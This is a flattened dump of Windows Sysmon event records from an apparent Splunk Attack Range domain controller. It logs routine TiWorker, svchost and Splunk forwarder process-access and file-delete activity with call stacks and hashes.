12:02:26.072{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006127Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:26.072{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006126Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:26.072{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006125Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:26.057{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006124Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:26.057{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 23542300x80000000000000006123Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:26.057{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DFB4DBA0DD5A7C2D364CF1F765C226FF,SHA256=61F3726907CB912EF1FE6224965FBA3E597D7331F9D7D6137B52180E5A4AFF4F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000006122Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:26.041{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006121Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:26.041{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006120Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:26.041{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006119Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:26.041{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006118Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:26.041{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006117Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:26.041{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006116Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:26.025{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 23542300x80000000000000006115Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:26.025{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=7DA4BCA9C5A66EF83D9DF9C03420209B,SHA256=D8134EBDDC65F31B42CCA335F4BA74F4BFC97D38985360D5BCD7AB811D137851,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000006114Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:26.025{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=1C0638A4A3BCFE49C85EA5036902A7C1,SHA256=D034A7565BD64359A97C1FF36D88848F84FB03ADF7AD13FA7251F8B73D984979,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000006113Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:26.010{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006112Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:26.010{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006111Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:26.010{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006110Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:25.994{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006109Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:25.994{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006108Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 